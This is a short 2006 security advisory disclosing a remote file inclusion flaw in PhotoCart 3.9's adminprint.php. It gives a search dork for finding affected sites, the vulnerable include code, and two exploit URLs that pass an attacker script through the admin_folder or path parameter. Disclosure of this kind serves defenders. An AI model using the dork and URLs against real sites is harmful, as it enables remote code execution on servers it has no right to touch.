Security Advisory: PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  phpPC 1.04 Multiples Remote File Inclusion
  Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities
  Vulnerability in PostNuke
  Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

From: irvian <irvian_yoe_(at)_yahoo.com>
Date: 22.11.2006
Subject: PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability

#################################################################################
####################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Script site: http://www.picturespro.com/store/programs/129-photo_cart.html
# Dork       : inurl :/PhotoCart/
#
#################################################################################
####################
##
##
## Bug Found By : irvian
##
##
#################################################################################
###################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#################################################################################
####################

bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
   adminsessionCheck();

Expl: http://www.site.com/PhotoCart/adminprint.php?admin_folder=[evil_scripts]
     http://www.site.com/PhotoCart/adminprint.php?path=[evil_scripts]

test server